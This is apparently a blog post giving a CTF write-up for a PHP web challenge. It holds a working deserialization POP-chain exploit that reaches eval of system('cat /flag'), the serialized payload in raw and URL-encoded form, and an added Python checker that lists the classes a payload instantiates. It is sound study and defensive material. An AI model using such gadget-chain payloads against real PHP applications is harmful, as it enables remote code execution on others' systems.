polarctfweb-easyRead

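After opening the challenge you immediately see a pile of PHP code, so I just grilled the AI with it.
Nothing much to say; the AI solved it instantly.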
```php
<?php

class Read {
    public $source;
    public $is;

    // Runs when a Read object is used as a string.
    public function __toString() {
        return $this->is->run("Read");
    }

    // Runs on unserialize(); concatenating $source treats it as a string.
    public function __wakeup() {
        echo "Hello>>>".$this->source;
    }
}

class Help {
    public $source;
    public $str;

    public function Printf($what) {
        echo "Hello>>>".$what;
        echo "
";
        return $this->str->source;
    }

    // Runs when an undefined method (here run()) is called.
    public function __call($name, $arguments) {
        $this->Printf($name);
    }
}

class Polar {
    private $var;

    public function getit($value) {
        eval($value);
    }

    // Runs when the object is called like a function.
    public function __invoke() {
        $this->getit($this->var);
    }
}

class Doit {
    public $is;
    private $source;

    public function __construct() {
        $this->is = array();
    }

    // Runs when an inaccessible property (here the private $source) is read.
    public function __get($key) {
        $vul = $this->is;
        return $vul();
    }
}

// ================== Build the POP chain ==================

// Create the objects
$R1 = new Read();
$R2 = new Read();
$H = new Help();
$D = new Doit();
$P = new Polar();

// Set Polar::$var to the code to execute: cat /flag
$ref = new ReflectionClass('Polar');
$prop = $ref->getProperty('var');
$prop->setAccessible(true);
$prop->setValue($P, "system('cat /flag');");

// Link: Doit -> Polar
$D->is = $P;

// Link: Help -> Doit
$H->str = $D;

// Link: R2 (Read) -> Help
$R2->is = $H;

// The source of the top-level R1 (Read) points to R2
$R1->source = $R2;

// Generate the payload
$payload = serialize($R1);

echo "RAW:\n".$payload."\n\n";
echo "URLENCODE:\n".urlencode($payload)."\n";
```

exp

```
RAW:
O:4:"Read":2:{s:6:"source";O:4:"Read":2:{s:6:"source";N;s:2:"is";O:4:"Help":2:{s:6:"source";N;s:3:"str";O:4:"Doit":2:{s:2:"is";O:5:"Polar":1:{s:10:"Polarvar";s:20:"system('cat /flag');";}s:12:"Doitsource";N;}}}s:2:"is";N;}

URLENCODE:
O%3A4%3A%22Read%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Read%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A2%3A%22is%22%3BO%3A4%3A%22Help%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Doit%22%3A2%3A%7Bs%3A2%3A%22is%22%3BO%3A5%3A%22Polar%22%3A1%3A%7Bs%3A10%3A%22%00Polar%00var%22%3Bs%3A20%3A%22system%28%27cat+%2Fflag%27%29%3B%22%3B%7Ds%3A12%3A%22%00Doit%00source%22%3BN%3B%7D%7D%7Ds%3A2%3A%22is%22%3BN%3B%7D
```

Got the flag, but for some reason submitting it always fails.
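A defender-side check for payloads shaped like the one above, as an added example that is not part of the original post: it walks a PHP `serialize()` string by its declared byte lengths and lists every class the string would instantiate, so an endpoint can reject or log anything outside its allowlist before `unserialize()` runs. The function names and the `PLACEHOLDER` sample are assumptions made for this example.

```python
# Added example (not from the original post): list every class a PHP
# serialize() string would instantiate. Handles N, b, i, d, s, a, O, r and R only.

def _until(data: bytes, pos: int, stop: bytes) -> tuple[bytes, int]:
    """Return the bytes from pos up to stop, and the offset just past stop."""
    end = data.index(stop, pos)
    return data[pos:end], end + len(stop)

def _walk(data: bytes, pos: int, found: list[str]) -> int:
    """Consume one serialized value at pos and return the next offset."""
    tag = data[pos:pos + 1]
    if tag == b"N":                                # N;
        return pos + 2
    if tag in (b"b", b"i", b"d", b"r", b"R"):      # x:<value>;
        return _until(data, pos + 2, b";")[1]
    if tag == b"s":                                # s:<len>:"<len bytes>";
        length, pos = _until(data, pos + 2, b":")
        return pos + 1 + int(length) + 2           # quote, body, closing ";
    if tag in (b"a", b"O"):
        pos += 2
        if tag == b"O":                            # O:<len>:"<class>":<n>:{...}
            length, pos = _until(data, pos, b":")
            found.append(data[pos + 1:pos + 1 + int(length)].decode("latin-1"))
            pos += 1 + int(length) + 2             # quote, name, closing ":
        count, pos = _until(data, pos, b":{")
        for _ in range(2 * int(count)):            # key, value, key, value, ...
            pos = _walk(data, pos, found)
        return pos + 1                             # closing }
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")

def classes_in(payload: bytes) -> list[str]:
    """Class names in instantiation order; ValueError if payload is malformed."""
    found: list[str] = []
    if _walk(payload, 0, found) != len(payload):
        raise ValueError("trailing bytes after serialized value")
    return found

def disallowed(payload: bytes, allowed: set[str]) -> list[str]:
    """Classes in payload that the endpoint has no reason to accept."""
    return [name for name in classes_in(payload) if name not in allowed]

# Constructed sample with the same object graph as the chain above; the private
# property names carry the NUL bytes that the RAW output does not display.
SAMPLE = (b'O:4:"Read":2:{s:6:"source";O:4:"Read":2:{s:6:"source";N;s:2:"is";'
          b'O:4:"Help":2:{s:6:"source";N;s:3:"str";O:4:"Doit":2:{s:2:"is";'
          b'O:5:"Polar":1:{s:10:"\x00Polar\x00var";s:11:"PLACEHOLDER";}'
          b's:12:"\x00Doit\x00source";N;}}}s:2:"is";N;}')

if __name__ == "__main__":
    print(disallowed(SAMPLE, allowed=set()))
```

Because strings are skipped by length, text inside a string value cannot hide or fake a class name. On the PHP side the same allowlist can be enforced with the `allowed_classes` option of `unserialize()`.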

posted @ 2025-12-08 21:01  CLAY666